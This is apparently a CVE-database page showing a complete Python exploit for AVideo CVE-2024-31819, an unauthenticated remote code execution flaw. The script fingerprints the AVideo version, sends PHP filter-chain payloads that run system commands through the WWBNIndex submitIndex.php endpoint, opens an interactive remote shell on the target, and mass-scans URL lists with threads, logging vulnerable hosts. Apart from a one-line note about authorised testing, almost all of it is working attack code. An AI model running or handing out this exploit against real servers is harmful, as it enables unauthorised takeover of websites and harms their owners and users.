4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / exploit.py PY
import re
import requests
import argparse

from packaging import version
from rich.console import Console
from alive_progress import alive_bar
from prompt_toolkit import PromptSession
from prompt_toolkit.formatted_text import HTML
from prompt_toolkit.history import InMemoryHistory
from php_filter_chain import PHPFilterChainGenerator
from concurrent.futures import ThreadPoolExecutor, as_completed

# Requests in this script are sent with verify=False; silence the
# InsecureRequestWarning urllib3 would otherwise emit for each of them.
requests.packages.urllib3.disable_warnings(
    category=requests.packages.urllib3.exceptions.InsecureRequestWarning
)


class AVideoExploit:
    """Checker and interactive client for AVideo CVE-2024-31819.

    The class detects the AVideo version advertised by a site, posts a PHP
    filter-chain payload to the WWBNIndex plugin endpoint and parses the
    command output that the payload wraps between ``[S]`` and ``[E]``.

    Intended for security testing of systems you are authorised to assess.
    """

    # Plugin endpoint, relative to the site root.
    _ENDPOINT_PATH = "/plugin/WWBNIndex/submitIndex.php"
    # Timeout, in seconds, applied to every HTTP request.
    _REQUEST_TIMEOUT = 10

    # A version is one or more dot-separated integers. Requiring a digit on
    # both sides of every dot keeps a sentence-ending "." out of the capture,
    # which would otherwise make ``version.parse`` reject the string.
    _FOOTER_VERSION_RE = re.compile(
        r"Powered by AVideo ® Platform v(\d+(?:\.\d+)*)"
    )
    _COMMENT_VERSION_RE = re.compile(
        r"<!--.*?v:(\d+(?:\.\d+)*).*?-->", re.DOTALL
    )
    # Command output is wrapped between these markers by the PHP snippet.
    _OUTPUT_RE = re.compile(r"\[S\](.*?)\[E\]", re.DOTALL)

    def __init__(self, base_url):
        """Store the target base URL and create the console used for output.

        Args:
            base_url: Base URL used by ``send_payload``; may be ``None`` when
                only the per-URL check methods are used.
        """
        self.console = Console()
        self.base_url = base_url

    def custom_print(self, message: str, header: str) -> None:
        """Print ``message`` prefixed with a coloured ``[header]`` tag.

        Args:
            message: Text to print.
            header: One of ``+``, ``-``, ``!`` or ``*``; any other value is
                rendered in white.
        """
        header_colors = {"+": "green", "-": "red", "!": "yellow", "*": "blue"}
        color = header_colors.get(header, "white")
        self.console.print(f"[bold {color}][{header}][/bold {color}] {message}")

    def generate_php_filter_payload(self, command):
        """Return the PHP filter chain generated for ``command``."""
        generator = PHPFilterChainGenerator()
        return generator.generate_filter_chain(command)

    @classmethod
    def _endpoint(cls, url):
        """Build the plugin endpoint URL for ``url``.

        Trailing slashes on ``url`` are dropped so the result never contains
        a double slash before the plugin path.
        """
        return f"{(url or '').rstrip('/')}{cls._ENDPOINT_PATH}"

    @classmethod
    def _extract_version(cls, html):
        """Return the AVideo version found in ``html``, or ``None``.

        The footer banner is tried first, then the ``v:`` HTML comment.
        """
        for pattern in (cls._FOOTER_VERSION_RE, cls._COMMENT_VERSION_RE):
            match = pattern.search(html)
            if match:
                return match.group(1)
        return None

    def _post_payload(self, url, payload):
        """POST ``payload`` as ``systemRootPath`` to the endpoint of ``url``.

        Returns:
            The ``requests`` response object.

        Raises:
            requests.exceptions.RequestException: If the request fails.
        """
        return requests.post(
            self._endpoint(url),
            data={"systemRootPath": payload},
            headers={"Content-Type": "application/x-www-form-urlencoded"},
            verify=False,
            timeout=self._REQUEST_TIMEOUT,
        )

    def send_payload(self, payload):
        """Send ``payload`` to ``self.base_url``.

        Returns:
            The response body when the server answers with HTTP 200,
            otherwise ``False`` (non-200 status or request failure).
        """
        try:
            response = self._post_payload(self.base_url, payload)
        except requests.exceptions.RequestException:
            return False
        if response.status_code == 200:
            return response.text
        return False

    def parse_output(self, output):
        """Extract the text between the ``[S]`` and ``[E]`` markers.

        Returns:
            The stripped text between the first marker pair, or ``None``
            when the markers are not present.
        """
        match = self._OUTPUT_RE.search(output)
        if match:
            return match.group(1).strip()
        return None

    def interactive_shell(self):
        """Run a prompt loop that sends each entered command to the target.

        ``exit`` leaves the loop and ``clear`` clears the console. Ctrl-C and
        Ctrl-D also leave the loop. Empty input is ignored. The command text
        is placed verbatim between single quotes in the PHP snippet.
        """
        session = PromptSession(history=InMemoryHistory())
        while True:
            try:
                cmd = session.prompt(
                    HTML("<ansiyellow><b>$ </b></ansiyellow>"), default=""
                ).strip()
            except (KeyboardInterrupt, EOFError):
                # Ctrl-D raises EOFError; treat it like Ctrl-C instead of
                # letting it surface as a traceback.
                self.custom_print("Exiting interactive shell...", "!")
                break

            if not cmd:
                # Nothing to run; avoid a pointless request.
                continue
            if cmd.lower() == "exit":
                break
            if cmd.lower() == "clear":
                self.console.clear()
                continue

            php_code = f"<?php echo '[S]';system('{cmd}');echo '[E]';?>"
            payload = self.generate_php_filter_payload(php_code)
            output = self.send_payload(payload)

            if not output:
                self.custom_print(
                    "Failed to receive response from the server.", "-"
                )
                continue

            clean_output = self.parse_output(output)
            if clean_output:
                print(f"{clean_output}\n")
            else:
                self.custom_print(
                    "No command output returned or error occurred.", "-"
                )

    def check_single_url(self, url):
        """Check one URL and report the outcome.

        Returns:
            A ``(message, is_vulnerable)`` tuple. ``message`` is a
            newline-terminated description and ``is_vulnerable`` is ``True``
            only when the marker-wrapped command output was returned.
        """
        try:
            version_status, avideo_version = self.is_version_vulnerable(url)
            if version_status:
                php_code = "<?php echo '[S]';system('whoami');echo '[E]';?>"
                payload = self.generate_php_filter_payload(php_code)
                response = self._post_payload(url, payload)
                if response.status_code == 200:
                    output = self.parse_output(response.text)
                    if output:
                        return (
                            f"{url} is vulnerable, Version: {avideo_version}, Command output: {output}\n",
                            True,
                        )
                return (
                    f"{url} is not vulnerable or failed to execute command, Version: {avideo_version}\n",
                    False,
                )
            elif avideo_version:
                return (
                    f"{url} Version: {avideo_version} is not within the vulnerable range.\n",
                    False,
                )
            else:
                return (
                    f"{url} AVideo version could not be determined. Manual check advised.\n",
                    False,
                )
        except requests.exceptions.RequestException:
            return (f"{url} Request failed.\n", False)

    def check_avideo_version(self, url):
        """Fetch ``url`` and return the advertised AVideo version string.

        Returns:
            The version string, or ``None`` when the request fails or no
            version marker is found in the page.
        """
        try:
            response = requests.get(
                url, verify=False, timeout=self._REQUEST_TIMEOUT
            )
        except requests.exceptions.RequestException:
            return None
        return self._extract_version(response.text)

    def is_version_vulnerable(self, url):
        """Decide whether the version served at ``url`` is in range.

        Returns:
            A ``(in_range, version_string)`` tuple. When no version can be
            detected the result is ``(True, "unknown")``. When the detected
            string cannot be parsed as a version the result is
            ``(True, version_string)``, so the caller still runs the check.
        """
        avideo_version_str = self.check_avideo_version(url)
        if avideo_version_str is None:
            return True, "unknown"

        try:
            parsed_version = version.parse(avideo_version_str)
        except version.InvalidVersion:
            # Newer ``packaging`` releases raise instead of returning a
            # legacy version object; handle it like the legacy case below.
            return True, avideo_version_str

        if not isinstance(parsed_version, version.Version):
            return True, avideo_version_str

        is_vulnerable = (
            version.parse("12.4") <= parsed_version <= version.parse("14.2")
        )
        return is_vulnerable, avideo_version_str

    def check_urls_and_write_output(self, urls, max_workers, output_path):
        """Check ``urls`` concurrently and record the positive results.

        Args:
            urls: URLs to check.
            max_workers: Size of the worker thread pool.
            output_path: File that positive results are appended to, or a
                falsy value to skip writing.
        """
        with ThreadPoolExecutor(max_workers=max_workers) as executor, alive_bar(
            len(urls), enrich_print=False
        ) as bar:
            futures = {executor.submit(self.check_single_url, url): url for url in urls}
            for future in as_completed(futures):
                try:
                    result, is_vulnerable = future.result()
                except Exception as exc:
                    # One failing target must not abort the whole batch or
                    # leave the progress bar short of its total.
                    self.custom_print(
                        f"{futures[future]} check failed ({type(exc).__name__}).",
                        "-",
                    )
                else:
                    if is_vulnerable:
                        self.custom_print(result, "+")
                        if output_path:
                            with open(output_path, "a", encoding="utf-8") as file:
                                file.write(result)
                bar()

        if output_path:
            print(f"Results written to {output_path}")


def main():
    """Parse the command line and run a single-URL or file-based check.

    With ``-u`` the URL is version-checked, tested and, on success, an
    interactive prompt is started. With ``-f`` every non-blank line of the
    file is treated as a URL and checked using ``-t`` worker threads;
    positive results are appended to the ``-o`` file when given. ``-u``
    takes precedence when both are supplied.
    """
    parser = argparse.ArgumentParser(
        description="AVideo CVE-2024-31819 - Unauthenticated Remote Code Execution"
    )
    parser.add_argument("-u", "--url", help="Base URL for single target", default=None)
    parser.add_argument(
        "-f", "--file", help="File containing list of URLs", default=None
    )
    parser.add_argument(
        "-t", "--threads", help="Number of threads to use", type=int, default=20
    )
    parser.add_argument(
        "-o", "--output", help="Output file to save results", default=None
    )

    args = parser.parse_args()

    if not args.url and not args.file:
        print(
            "Error: No URL or file provided. Use -u to specify a single URL or -f to specify a file containing URLs."
        )
        return

    if args.url:
        avideo = AVideoExploit(args.url)
        is_vulnerable_version, avideo_version = avideo.is_version_vulnerable(args.url)
        proceed_with_check = True

        if avideo_version != "unknown":
            if is_vulnerable_version:
                avideo.custom_print(
                    f"Version {avideo_version} is within the vulnerable range. Proceeding with vulnerability check.",
                    "+",
                )
            else:
                avideo.custom_print(
                    f"Version {avideo_version} is not within the vulnerable range. Detected version: {avideo_version}",
                    "-",
                )
                proceed_with_check = False
        else:
            avideo.custom_print(
                "Unable to determine AVideo version. Proceeding with vulnerability check as a precaution.",
                "!",
            )

        if proceed_with_check:
            output, is_vulnerable = avideo.check_single_url(args.url)
            if is_vulnerable:
                avideo.custom_print(output, "+")
                avideo.interactive_shell()
            else:
                avideo.custom_print(
                    "The URL is not vulnerable or failed to execute the command.", "-"
                )
        return

    # File mode: read the list up front so the file handle is released
    # before the scan starts, and so a bad path gives a clear message.
    try:
        with open(args.file, "r", encoding="utf-8") as f:
            # Blank lines are not targets; skip them and trim whitespace.
            urls = [line.strip() for line in f if line.strip()]
    except (OSError, UnicodeDecodeError) as exc:
        print(f"Error: Unable to read URL file {args.file}: {exc}")
        return

    if not urls:
        print(f"Error: No URLs found in {args.file}.")
        return

    avideo = AVideoExploit(args.url)
    avideo.check_urls_and_write_output(urls, args.threads, args.output)

# Run the command-line interface only when executed as a script.
if __name__ == "__main__":
    raise SystemExit(main())